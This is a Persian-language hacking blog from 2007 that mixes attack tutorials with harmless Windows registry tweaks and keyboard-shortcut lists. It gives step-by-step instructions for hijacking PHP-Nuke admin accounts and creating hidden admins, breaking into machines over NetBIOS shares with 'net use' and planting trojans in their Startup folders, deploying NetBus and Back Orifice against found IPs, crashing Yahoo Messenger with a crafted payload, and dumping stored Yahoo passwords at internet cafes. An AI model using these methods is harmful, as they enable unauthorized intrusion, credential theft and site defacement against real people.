هکرهای دیوانه

خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

|+| نوشته شده توسط احسان در پنجشنبه هفدهم آبان 1386 ساعت 17:27 |

روش اول:

براي اينكه بتوانيد فردي را كه با وي گفتگو مي كنيد هك كنيد بايد در ابتدا شماره IP وي را بدست آوريد. براي اينكار طبق دستورات زير عمل نماييد:

پس از اينكه وارد مسنجر شديد و طرف مقابل شما نيز آنلاين شد وارد Command Prompt شويد و فرمان زير را تايپ نماييد

netstat -n

نتايجي مشابه نتايج زير ظاهر مي شوند :

Active Connections

Proto Local Address Foreign Address State

TCP 195.219.176.126:1296 66.163.173.77:5050 ESTABLISHED

TCP 195.219.176.126:1341 66.218.75.149:80 LAST_ACK

TCP 195.219.176.126:1325 212.234.112.74:5101 SYN_SENT

سطر Proto پروتكل را نشان مي دهد كه يا TCP است و يا UDP

در موردlocal Address و Foreign Address هم بايد بگم كه اين دو ستون شماره IP و بعد به فاصله دو نقطه شماره پورت را نشان مي دهند و ستون state وضعيت اتصال را نشان مي دهد. و حالا مي رويم سراغ پيدا كردن IP طرف مقابل. اولين كاري كه بايد بكنيد اين است كه در ستون Local address و يا Foreign Address به دنبال سطري باشيم كه پورت 5101 باز داشته باشد. در اين مثال سطر آخر سطر مورد نظر ماست. پس IP طرف مقابل شماره كناره اين پورت يعني 212.234.112.74 است. توضيح اينكه هميشه اين روش جواب نمي دهد.

اگه به جاي دستور netstat –n از دستور netstat استفاده كنيد به جاي شماره IP معادل هاي اسمي أن ها و در ستون آخر اسم كامپيوتر طرف مقابل را خواهيم ديد.

روش دوم با استفاده از اي ميل:

در اين روش شما بايد قرباني را راضي كنيد كه به هر بهانه اي به شما يك ميل بزند. پس از اينكه اين كار را انجام داد. وارد محيط ايميل خود شويد. Mail Optionرا انتخاب كنيد. سپس گزينه General Preferences را انتخاب كنيد. در اين قسمت تغييرات زيادي داده مي شود از جمله نام خودتان و . . . در قسمته headers گزينه Show all را انتخاب كنيد و IP ايميل قرباني را نگاه كنيد.

استفاده از آي پي رو در پست هاي بعدي حتما براتون آموزش ميدم همينقدر الان بهتون بگم كه ميتونيد با داشتن آي پي طرف مقابل بدون دادن فايل به اون اونو هك كنيد!!!

منبع : برگرفته از سایت هک و کرک .بمب و بوت

|+| نوشته شده توسط احسان در پنجشنبه هفدهم آبان 1386 ساعت 17:13 |

سلام من احسان هستم و می خواستم شروع دوباره ی این وبلاگ را به همه ی شما عزیزان مژده بدهم
و نیروی کمکی و همکار نیازمندم
ID : rom_rom3o@yahoo.com

|+| نوشته شده توسط احسان در سه شنبه پانزدهم آبان 1386 ساعت 14:19 |

ميتوان رجيستری را قلب ويندوز ناميد. با تغيير برخی از كدهای رجيستری ميتوانيد برخی از خصوصيات ويندوز را كه خوشتان نمی آيد حذف ياتغيير دهيد.

تذكر مهم:
بايد دقيقا مثل همين كليدها را در رجيستری وارد كنيد.كوچكترين تغييری ممكن است منجر به دوباره اينستال كردن ويندوز شود.

برای شروع كار ابتدا در قسمت Run اين دستور را وارد كنيد و كليد OK را كليك كنيد:
Regedit
پس از تغيير دستور مورد نظر فقط پنجره Registry Editor را ببنديد و كامپيوتر را Restart كنيد تا تغييرات اعمال شوند.

حالا هر كدام از دستورات زير را كه دوست داريد ميتوانيد تغيير دهيد.

بدون Favorites :
اگر از در منوی خوشتان نمی آيد ميتوانيد آن را حذف كنيد.برای اين كار به زير كليد:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
رفته و يك مقدار به نام NoFavoritesMenu بسازيد و به آن مقدار 1 دهيد.

برداشتن RUN از منوی START :
به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار باينری به نام NoRun بسازيد و به آن مقدار01 بدهيد.بدين ترتيب حتی كليدهای نيز كار نخواهند كرد.

بدون جستجو:
اگر دوست نداريد كسی فايلی را در كامپيوتر شما جستجو كند , ميتوانيد Search را از منوی Start حذف كنيد.
برای اين كار به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVresion\Polisies\Explorer]
و يك مقدارDWORD به نام NoFind بسازيد و به آن مقدار1 بدهيد.بدين ترتيب حتی كليد های F3 وWindows+F نيز كار نخواهند كرد.

بدون جاسوس:
وقتی سندی را باز ميكنيد , ويندوز يك ميانبر برای آن فايل درMy Documents در منوی Start قرار ميدهد.اين موضوع ميتواند به عنوان يك جاسوس بر ضد شما عمل كند.
برای حذف آن به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVresion\Polisies\Explorer]
و يك مقدار باينری به نام NoRecentDocsHistory بسازيد و به آن مقدار01 بدهيد.همچنين برای حذف آن از منوی ميتوانيد يك مقدار باينری به نام NoRecentDocsMenu بسازيد و به آن مقدار 01 را بدهيد.

حذف Log Off :
برای حذف آن از منوی Start بايد به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVresion\Polisies\Explorer]
و يك مقدارDWORD به نام NoLogOff بسازيد و به آن مقدار1 بدهيد.

بدون انيميشن:
زمانی كه منويی را باز مينيد , ويندوز اين عمليات را در چند تصوير انجام ميدهد.كه اين موضوع بعضی اوقات خسته كننده ميشود.
برای غير فعال كردن اين موضوع , به زير كليد زير برويد:
[HKEY_CURRENT_USER\ControlPanel\Desktop\WindowsMetrics]
و به مقدار رشته ای مقدار صفر را بدهيد.حالا به نظر ميرسد ويندوز سريعتر شده.

- مخفی كردن Device Manager :
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Windows\CurrentVersion\Policies\System]
و يك مقدار DWORD به نام NoDevMgrPage بسازيد و به آن مقدار يك بدهيد.

- كاغذ ديواری ثابت(Wallpaper):
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Windows\CurrentVersion\Policies\ActiveDesktop]
و يك مقدار DWORD به نام NoChangingWallpaper بسازيد و به آن مقدار يك بدهيد.

- بدون كليك راست بر روی دسك تاپ:
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار DWORD به نام NoViewContextMenu بسازيد و به آن مقدار يك بدهيد.

- بدون كليك راست بر روی نوار وظيفه:
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار DWORD به نام NoSetTaskbar بسازيد و به آن مقدار يك بدهيد.

- ويرايش يا حذف آخرين دستورات Run :
به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
و هر تغييری را كه دوست داريد بدهيد.

- بدون كليك راست بر روی منوی Start :
به 2 زير كليد زير برويد:
[HKEY_CLASSES_ROOT\Directory\shell]
[HKEY_CLASSES_ROOT\Folder\shell]
و نام زير كليد Shell را به Shell.old تغيير دهيد.

- برداشتن علامت ميان بر از آيكون ها(فلش كوچك در سمت چپ در پايين آيكون):
به 2 زير كليد زير برويد:
[HKEY_CLASSES_ROOT\Inkfile]
[HKEY_CLASSES_ROOT\piffile]
و مقدار IsShortcut را حذف كنيد.

- تغييرعنوان مرورگر اينترنت:
مرورگر Internet Explorer به طور پيش فرض دارای عنوان Microsoft Internet Explorer است. برای تغيير آن به زير كليد زير برويد:ِ
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
و يك مقدار رشتهای به نام Window Title بسازيد و به آن هر عبارتی را كه دوست داريد , بدهيد.
- بدون دسك تاپ:
به زير كليد زير برويد:
[HKEY_USERS\_DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار باينری به نام NoDesktop بسازيد و به آن مقدار 01 بدهيد.

- دسك تاپ غير فعال:
به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار DWORD به نام NoActiveDesktop بسازيد و برای فعال كردن آن مقدار صفر و برای غير فعال كردن آن مقدار يك بدهيد.

پيغامی قبل از ورود به ويندوز:
اگر ميخواهيد هر بار كه ويندوز شروع به كار ميكند , پيغام هشدار , راهنمايی , خوش آمد گويی و ... را بدهد , به زير كليد زير برويد:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon]
و دو مقدار رشته ای به نامهای LegalNoticeCaption وLegalNoticeText بسازيد.به LegalNoticeCaption نام كادر پيغام و به LegalNoticeText متنی كه دوست داريد نمايش داده شود را بنويسيد.

تغيير نام مالك ويندوز:
به زير كليد زير برويد:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon]
حالا به مقدار RegisteredOwner , نام خودتان و به مقدار RegisteredOrganization , نام شركتتان را اختصاص دهيد.

برداشتن سطل آشقال از روی دسكتاپ:
به زير كليد زير برويد:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace]
مراجعه كنيد و زير كليد سطل آشغال را كه دارای شناسه زير است پاك كنيد( Delete ).
{645FF040-5081-101B-9F08-00AA002F954E}

جلوگيری از تغيير كلمه عبور:
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVresion\Policies\System]
يك مقدار عددی (DWORD ) به نام NoSecCPL بسازيد و به آن مقدار 1 دهيد.

حذف منوی فايل از نوار منوی Windows Explorer :
به زير كليد زير برويد:
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVresion\Policies\Explorer]
و يك متغيير باينری به نام NoFileMenu بسازيد و به آن مقدار1 دهيد.

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:36 |

برای دوستانی که در مرورگر IE زیاد کار میکنند تمامی کلید های میانبر را لیست و برای هریک توضیحات لازم را داده ام امیدوارم برای این دوستان مفید باشد. خوانده این مقاله رو به همه دوستان توصیه میکنم.

F1 : نمایش راهنمای مرورگر. در زمانی که پنجره ای باز باشد راهنمای مربوط به همان عنصر را نمایش میدهد.

F11 : جابجایی بین حالت تمام صفحه در مرورگر و پنجره در ابعاد عادی

TAB : حرکت بسمت جلو در بین عناصر صفحه وب و نوار آدرس و نوار لینک.

SHIFT+TAB : حرکت بسمت عقب در بین عناصر صفحه وب و نوار آدرس و نوار لینک.

ALT+HOME : رفتن به صفحه خانگی

ALT+RIGHT ARROW : رفتن به صفحه بعدی

ALT+LEFT ARROW : رفتن به صفحه قبلی

BACKSPACE : رفتن به صفحه قبلی

SHIFT+F10 : نمایش منوی آبشاری و میان بر برای یک لینک

CTRL+TAB : انتقال بین فریم ها بسمت جلو

F6 : انتقال بین فریم ها بسمت جلو

SHIFT+CTRL+TAB : انتقال بین فریم ها بسمت عقب

UP ARROW : حرکت صفحه بسمت ابتدای سند

DOWN ARROW : حرکت صفحه بسمت انتهای سند

PAGE UP : حرکت به سمت ابتدای صفحه با انجام پرشی بزرگ تر ( نسبت به UP ARROW)

PAGE DOWN : حرکت به سمت انتهای صفحه با انجام پرشی بزرگ تر ( نسبت به DOWN ARROW)

HOME : انتقال صفحه به ابتدای سند

END : انتقال صفحه به انتهای سند

CTRL+F : نمایش پنجره جستجو برای صفحع جاری

F5 : تازه سازی (Refresh) نمودن صفحه در صورتی که نیازی به این کار باشد( تاریخ صفحه که بصورت محلی بروی سیستم شما ذخیره شده است با تاریخ صفحه در وب متفاوت باشد)

CTRL+R : تازه سازی (Refresh) نمودن صفحه در صورتی که نیازی به این کار باشد( تاریخ صفحه که بصورت محلی بروی سیستم شما ذخیره شده است با تاریخ صفحه در وب متفاوت باشد)

CTRL+F5 : تازه سازی (Refresh) نمودن صفحه ( تاریخ صفحه که بصورت محلی بروی سیستم شما ذخیره شده است با تاریخ صفحه در وب یکسان باشد) مناسب برای صفحاتی که توسط ISPها cache می شوند.

ESC : متوقف نمودن عملیات دانلود در صفحه

CTRL+O : باز نمودن یک مکان (آدرس اینترنتی) دیگر

CTRL+L : باز نمودن یک مکان (آدرس اینترنتی) دیگر

CTRL+N : باز نمودن یک صفحه مرورگر دیگر

CTRL+W : بستن صفحه مرورگر جاری

CTRL+S : ذخیره نمودن صفحه جاری

CTRL+P : چاپ صفحه جاری

ENTER : فعال سازی لینک انتخاب شده

CTRL+E : باز نمودن جستجو در نوار مرورگر

CTRL+I : باز نمودن علایق(Favorites) در نوار مرورگر

CTRL+H : باز نمودن سابقه (History) در نوار مرورگر

ALT+D : قرار دادن متن انتخاب شده در نوار آدرس

F4 : نمایش نوار آدرس سوابق

CTRL+LEFT ARROW : در صورتی که این کلید را در نوار آدرس فشار دهید مکان نما به شکست بعدی سمت چپ ( محلی که کاراکتر / قرار دارد ) منتقل می گردد.

CTRL+RIGHT ARROW : در صورتی که این کلید را در نوار آدرس فشار دهید مکان نما به شکست بعدی سمت راست ( محلی که کاراکتر / قرار دارد ) منتقل می گردد.

CTRL+ENTER : در نوار آدرس با زدن این کلید رشته www. به اول متنی که در آدرس باز نوشته اید اضافه می گردد. همچنین رشته .com را به انتهای این رشته اضافه مینماید. مثال : Google è www.google.com

UP ARROW : در صورتی که خاصیت Auto Complete فعال باشد. در لیست مزبور به سمت بالا حرکت می کند.
DOWN ARROW : در صورتی که خاصیت Auto Complete فعال باشد. در لیست مزبور به سمت پایین حرکت می کند.
CTRL+D : صفحه جاری را به فهرست علایق (favorites) اضافه میکند.

CTRL+B : نمایش پنجره سازمان دهی علایق (favorites)

ALT+UP ARROW : بالا رفتن در لسیت در پنجره سازمان دهی علایق (favorites)

ARROW ALT+DOWN : پایین رفتن در لسیت در پنجره سازمان دهی علایق (favorites)

CTRL+X : حذف ( درصورت امکان) و انتقال کپی عنصر انتخاب شده به حافظه

CTRL+C : کپی عنصر انتخاب شده به حافظه

CTRL+V : اضافه نمودن عنصر درون حفافظه در مکان فعلی

CTRL+A : انتخاب تمام عناصر

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:35 |

ما به اين برنامه ها احتياج داريم که همش تو خود ويندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جايي که نوشته شده HOST NAME آي پي قرباني رو قرار مي ديم و در قسمت بعدي به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغيير ميدهيم و گزينه سوم که try to open port only هست را انتخاب و اسکن رو بزنيد. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip داديم. بعد از اسکن شما با قسمتي به نام Server Found مواجه مي شويد که يکسري آي پي را با پورتهاي باز مورد نظر شما پيدا کرده که در ادامه بايد يکي از آي پي هارو به دلخواه انتخاب کنيد.
در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد:

به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo

شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد

همه چيز در دست شماست

حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد .

حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:34 |

اگه دوست دارین که فقط با یک کلیک وارد inbox يا مديريت وبلاگ و يا صفحه

شخصی خودتون در سايتي كه در اوون عضو شدين , بشين پس اين برنامه

رو از دست ندين.

اسمش ROBOFORM هست.

حتما دانلود كن و گرنه ضرر كردي.

دانلود

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:26 |

این آسیبپذیری در قسمت انتقال فایل در برنامه YM! باعث می شود تا شخص حمله کننده بتواند از راه دورد برنامه YM! را از کار بی اندازد .

جزئیات:
سرویس YM! بسیاری از کاراکترهای خاص داخل در فیلد اسم کاربر (YhaooID) را فیلتر میکند (مثال ؟ و & ) . وقتی در خواستی برای ارسال فایل به یک کاربر به صورت بیش از 73 کاراکتر از “ % “ در مقابل اسم کاربر شخص مورد نظر مانند : VivtimID %%%% ارسال گردد سرویس یاهو کاراکترهایی مانند % را فیلتر کرده و سوالی در مورد برقراری یک کانال برای ورود فایل از کاربر مورد نظر می کند که با قبول درخواست دریافت فایل برنامه Yahoo Messenger از کار می افتد .

این مشکل به خاطر نقض در FT.dll است که وظیفه انتقال فایل بین دو ماشین را به صورت نقطه به نقطه بر عهده دارد . لینک دریافت فایلی که برای قربانی از طرف ماشین شخص حمله کننده ارسال می شود به صورت زیر است :

http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%2
5%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25
%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%2
5%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25
%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25
%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2
vykgw5e5j9dao0o9doeawsg31h9t8vey6uq19
6y 14 53
Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT

لینک بالا به صورت رمز شده است و کاراکترهای %25 در واقع همان کاراکترهای % می- باشند .

چگونگی استفاده :
از لینک زیر در قسمت run در ویندوز استفاده کنید قبل از انجام این کار به Yahoo Messenger وارد شوید (Login) :

YMSGR:sendfile?[victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%&c%c:\[somefile]

کاراکترهای دیگری مثل ؟ و & نیز قابل استفاده هستند باید توجه داشت مجموع کاراکترهای مورد نظر یعنی اسم کاربر به اضافه کاراکتر % نباید بیشتر از 73 کاراکتر باشند.

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:24 |

امروز یه برنامه اوردم که با اوون میتونبد ID و Pass آخرين كسي

كه با Y! Messenger لوگين شده رو پيدا كنيد.

به درد كافي نت ها ميخوره.

فايل رو كه به صورت zip هست دانلود كنيد و بعد اوون رو از حالت zip خارج كنيد.

فايلyahoodump.exe رو اجرا كرده و روي دكمه DUMP كليك كنيد.

حالا ID و Pass رو ببينيد.

دانلود

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:23 |

چه تجربه شما از کامپيوتر به زمان پادشاهی Dos برسد، چه به زمان ظهور ويندوز XP ، هميشه چيزهای جديدی براي يادگيری در مورد سيستم‌عامل مورد استفاده، وجود دارد. ما در اينجا تعدادی از نکات مهم در مورد استفاده از ويندوز را برای شما جمع‌آوری کرديم. غير از بعضی از نکات خاص که مشخص شدند، بقيه موارد در مورد ويندوزهای 98 ، ME ، 2000 و XP صادقند.

- کيبرد را به خاطر بسپار محيط ويندوز بر اساس آيکون‌ها، پنجره‌ها و نشانگرهاست که تمام اين‌ها معمولا با موس اداره می‌شود و همين برداشتن دست از روی کيبرد، برای حرکت دادن موس، سرعت تايپ را کاهش می‌دهد. و حالا اگه اصلاً موسی نبود چی؟ مثلاً وقتی که مشکل درايوری وجود داره! تقريباً هر کاری که با موس انجام می‌شود را می‌توانيد با کيبرد هم انجام بدهید. به طور مثال؛
- استفاده از Alt + Tab هنگامی که چندين پنجره و برنامه باز و در حال اجراست، اسامی آن‌ها روی نوار ابزار نشان داده می‌شود که با کليک کردن روی آن‌ها، می‌شود آن پنجره يا برنامه را فعال کرد. اما وقتی تعداد اين پنجره يا برنامه‌ها زياد باشد، اسامی‌ آن‌ها به علت کمبود جا خلاصه و غالبا نا‌مفهوم می‌شود و به علت کوچک شدن آيکن‌شان، دسترسی به آن‌ها مشکل. با زدن Alt + Tab ليست برنامه‌های جاری روی دسکتاپ ظاهر می‌شود و با زدن همين کليد‌ها می‌توان بين آن‌ها حرکت و هر کدام‌ را که می‌خواهيد، انتخاب و فعال کنيد. حتی بعضی مواقع برنامه‌هایی که روی نوار ابزار نشان داده نمی‌شوند هم، داخل اين ليست هستند.
- جانشين براي کليد‌های ويندوز کليد‌های ويندوز همان کليد‌هایی هستند که معمولا عکس پنجره يا آرم ويندوز روی‌ آن‌هاست و برای باز کردن منوی Start و کليک‌‌راست استفاده می‌شوند. اگر هنوز به کيبردی که فاقد اين کليد هاست، وفادار مانديد. می‌توانید از ترکيب کليد‌های Ctrl + Esc برای کليد Start و Shift + F10 برای کليک‌راست استفاده کنيد.
- پيدا کردن عملگر پنجره در ويندوز وقتی تنظيمی تغيير می‌کند، باعث می‌شود که پنجره‌ها در پشت صحنه قرار بگيرند، در واقع غير قابل انتخاب بشوند. با زدن Alt + Space منوی پنجره، در گوشه‌ی بالا (سمت چپ) ظاهر می‌شود که با زدن کليد M پنجره در حالت حرکت قرار ميگيرد. در این حالت می‌توانيد با کليد‌های جهت آن را جابجا کنيد. این‌ها فقط تعدادی از کليدهای ميانبر موجود در ويندوز هستند. برای پيدا کردن کليد‌های بيشتر از منوی Start وارد قسمت Help شوید و عبارت shortcut keys را جستجو کنید.
- استفاده از Disk Cleanup سيستمی که پر از فايل‌های غيرضروری و بلا‌استفاده‌ است، به مرور زمان کند و کندتر می‌شود و جستجوی فايل‌های مهم در آن مشکل‌تر. براي پاک کردن اين فايل‌ها منوی Srart را باز کنيد و اين مسير را طی کنيد؛
Start Menu –> Accessories –> System Tools –> Disk Cleanup
ابتدا ويندوز به محاسبه فضایی که بعد از خالی شدن Recycle bin ، Temporary internet files و فايل‌های فشرده قديمی ( در درايو‌های NTFS ) آزاد می‌شود، می‌پردازد. بعد از اين کار گزينه‌های مورد نظرتان را علامت بزنيد و روی Ok کليک کنيد تا اين فايل‌ها پاک شده و مقداری از فضای هارد آزاد شود.
- تغيير حجم Recycle bin بعضی مواقع ممکن است از فضایی که بعد از خالی شدن Recycle bin می‌بينید، شگفت‌زده بشين!
علت اين است که ويندوز بطور پيش فرض 10 درصد فضای هر درايو را به Recycle bin اختصاص می‌دهد. اين روش زمانی کاربرد داشت که درايو‌ها مقياس مگا‌بايتی داشتند ولی اين روزها که با گيگابايت سرو‌کار داريم، می‌توانید با کليک راست روی Recycle bin و انتخاب Propertise اين مقدار را به 1 درصد کاهش دهید.
- پاک کردن برنامه‌های بی‌استفاده برای راحت شدن از برنامه‌هایی که اصلا يا به ندرت از آن‌‌ها استفاده می‌کنید به Control Panel رفته و Add / Remove Programs را اجرا کنيد. در اينجا ليست برنامه‌های نصب شده روی سيستم، به همراه مقدار استفاده و حجمی که اشغال کردند، نشان داده می‌شود. اگر گزينه‌ای برای‌تان آشنا نيست، به آن دست نزنید چون ممکن‌ است براي سيستم ضروری باشد. در غير اينصورت برنامه‌ای که می‌خواهید پاک شود را، انتخاب کنید و روی Remove کليک کنيد.
